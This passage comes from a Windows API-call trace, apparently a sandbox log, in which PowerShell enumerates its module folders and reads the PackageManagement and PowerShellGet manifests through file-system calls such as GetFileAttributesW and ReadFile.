(normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\*"), lpFindFileData=0x5a0e824 | out: lpFindFileData=0x5a0e824*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49aae0a0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49aae0a0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49aae0a0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68e2e0 [0111.957] FindNextFileW (in: hFindFile=0x68e2e0, lpFindFileData=0x5a0e82c | out: lpFindFileData=0x5a0e82c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49aae0a0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49aae0a0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49aae0a0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0111.957] FindNextFileW (in: hFindFile=0x68e2e0, lpFindFileData=0x5a0e82c | out: lpFindFileData=0x5a0e82c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49aae0a0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49ad4200, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49ad4200, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0111.957] FindNextFileW (in: hFindFile=0x68e2e0, lpFindFileData=0x5a0e82c | out: lpFindFileData=0x5a0e82c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0111.957] FindClose (in: hFindFile=0x68e2e0 | out: hFindFile=0x68e2e0) returned 1 [0111.957] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e7e4) returned 1 [0111.957] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0ea44) returned 1 [0111.959] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0111.959] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0111.959] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e7c8) returned 1 [0111.959] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x5a0ea8c | out: lpFileInformation=0x5a0ea8c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49aae0a0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x3ea79a40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x3ea79a40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x10de)) returned 1 [0111.974] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e7c4) returned 1 [0111.974] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0111.974] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0111.974] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0111.974] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0111.975] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e7ec) returned 1 [0111.975] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b2184 | out: lpFileInformation=0x25b2184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49aae0a0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x3ea79a40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x3ea79a40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x10de)) returned 1 [0111.975] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e7e8) returned 1 [0111.975] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psd1")) returned 0xffffffff [0111.975] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psm1")) returned 0xffffffff [0111.975] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.cdxml")) returned 0xffffffff [0111.975] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.xaml")) returned 0xffffffff [0111.976] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.ni.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.ni.dll")) returned 0xffffffff [0111.976] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.dll")) returned 0xffffffff [0111.980] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\keecfmwgj\\documents\\windowspowershell\\modules")) returned 0xffffffff [0111.992] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules" (normalized: "c:\\program files (x86)\\windowspowershell\\modules")) returned 0x10 [0111.995] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0ea74) returned 1 [0111.995] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x31 [0111.995] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules", nBufferLength=0x31, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x30 [0111.995] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\*" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\*"), lpFindFileData=0x5a0e824 | out: lpFindFileData=0x5a0e824*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499a3700, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499ef9c0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499ef9c0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68e2e0 [0111.996] FindNextFileW (in: hFindFile=0x68e2e0, lpFindFileData=0x5a0e82c | out: lpFindFileData=0x5a0e82c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499a3700, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499ef9c0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499ef9c0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0111.996] FindNextFileW (in: hFindFile=0x68e2e0, lpFindFileData=0x5a0e82c | out: lpFindFileData=0x5a0e82c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499ef9c0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499ef9c0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499ef9c0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement", cAlternateFileName="PACKAG~1")) returned 1 [0111.996] FindNextFileW (in: hFindFile=0x68e2e0, lpFindFileData=0x5a0e82c | out: lpFindFileData=0x5a0e82c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499a3700, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499a3700, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499a3700, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet", cAlternateFileName="POWERS~1")) returned 1 [0111.996] FindNextFileW (in: hFindFile=0x68e2e0, lpFindFileData=0x5a0e82c | out: lpFindFileData=0x5a0e82c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0111.996] FindClose (in: hFindFile=0x68e2e0 | out: hFindFile=0x68e2e0) returned 1 [0111.996] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e7e4) returned 1 [0111.996] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0ea44) returned 1 [0111.996] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Modules.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\modules.psd1")) returned 0xffffffff [0111.996] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Modules.psm1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\modules.psm1")) returned 0xffffffff [0111.997] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Modules.cdxml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\modules.cdxml")) returned 0xffffffff [0111.997] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Modules.xaml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\modules.xaml")) returned 0xffffffff [0111.997] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Modules.ni.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\modules.ni.dll")) returned 0xffffffff [0111.997] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Modules.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\modules.dll")) returned 0xffffffff [0111.997] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x43 [0111.997] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x43, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x42 [0111.997] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e7c4) returned 1 [0111.997] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement"), fInfoLevelId=0x0, lpFileInformation=0x5a0ea88 | out: lpFileInformation=0x5a0ea88*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499ef9c0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499ef9c0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499ef9c0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0111.998] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e7c0) returned 1 [0111.999] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3f [0111.999] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x3f, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x3e [0111.999] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e7c4) returned 1 [0112.000] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget"), fInfoLevelId=0x0, lpFileInformation=0x5a0ea88 | out: lpFileInformation=0x5a0ea88*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499a3700, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499a3700, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499a3700, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0112.000] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e7c0) returned 1 [0112.000] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0ea74) returned 1 [0112.000] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x43 [0112.000] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x43, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x42 [0112.000] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\*" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\*"), lpFindFileData=0x5a0e824 | out: lpFindFileData=0x5a0e824*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499ef9c0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499ef9c0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499ef9c0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68e2e0 [0112.001] FindNextFileW (in: hFindFile=0x68e2e0, lpFindFileData=0x5a0e82c | out: lpFindFileData=0x5a0e82c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499ef9c0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x499ef9c0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499ef9c0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0112.001] FindNextFileW (in: hFindFile=0x68e2e0, lpFindFileData=0x5a0e82c | out: lpFindFileData=0x5a0e82c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x499ef9c0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49a61de0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49a61de0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0112.001] FindNextFileW (in: hFindFile=0x68e2e0, lpFindFileData=0x5a0e82c | out: lpFindFileData=0x5a0e82c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0112.001] FindClose (in: hFindFile=0x68e2e0 | out: hFindFile=0x68e2e0) returned 1 [0112.001] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e7e4) returned 1 [0112.001] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0ea44) returned 1 [0112.001] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x62 [0112.001] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x62, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x61 [0112.001] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e7c8) returned 1 [0112.001] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x5a0ea8c | out: lpFileInformation=0x5a0ea8c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49a3bc80, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x3ea79a40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x3ea79a40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x8f9)) returned 1 [0112.008] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e7c4) returned 1 [0112.008] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x62 [0112.008] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x62, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x61 [0112.008] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x62 [0112.008] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x62, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x61 [0112.008] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e7ec) returned 1 [0112.008] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25bbd18 | out: lpFileInformation=0x25bbd18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49a3bc80, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x3ea79a40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x3ea79a40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x8f9)) returned 1 [0112.009] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e7e8) returned 1 [0112.014] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x62 [0112.014] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x62, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x61 [0112.014] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e954) returned 1 [0112.015] CreateFileW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d0 [0112.015] GetFileType (hFile=0x3d0) returned 0x1 [0112.015] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e950) returned 1 [0112.015] GetFileType (hFile=0x3d0) returned 0x1 [0112.015] GetACP () returned 0x4e4 [0112.029] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e990*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e990*=0) returned 0x0 [0112.029] ReadFile (in: hFile=0x3d0, lpBuffer=0x25bcffc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e9bc, lpOverlapped=0x0 | out: lpBuffer=0x25bcffc*, lpNumberOfBytesRead=0x5a0e9bc*=0x8f9, lpOverlapped=0x0) returned 1 [0112.042] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e990*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e990*=0) returned 0x8f9 [0112.043] ReadFile (in: hFile=0x3d0, lpBuffer=0x25bc489, nNumberOfBytesToRead=0x307, lpNumberOfBytesRead=0x5a0e9bc, lpOverlapped=0x0 | out: lpBuffer=0x25bc489*, lpNumberOfBytesRead=0x5a0e9bc*=0x0, lpOverlapped=0x0) returned 1 [0112.043] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e990*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e990*=0) returned 0x8f9 [0112.043] ReadFile (in: hFile=0x3d0, lpBuffer=0x25bcffc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e9bc, lpOverlapped=0x0 | out: lpBuffer=0x25bcffc*, lpNumberOfBytesRead=0x5a0e9bc*=0x0, lpOverlapped=0x0) returned 1 [0112.043] CloseHandle (hObject=0x3d0) returned 1 [0112.217] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psd1")) returned 0xffffffff [0112.217] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psm1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psm1")) returned 0xffffffff [0112.217] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.cdxml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\packagemanagement.cdxml")) returned 0xffffffff [0112.217] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.xaml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\packagemanagement.xaml")) returned 0xffffffff [0112.217] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.ni.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\packagemanagement.ni.dll")) returned 0xffffffff [0112.217] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\packagemanagement.dll")) returned 0xffffffff [0112.218] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0ea74) returned 1 [0112.218] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3f [0112.218] GetFullPathNameW (in: lpFileName="C:\\Program Files 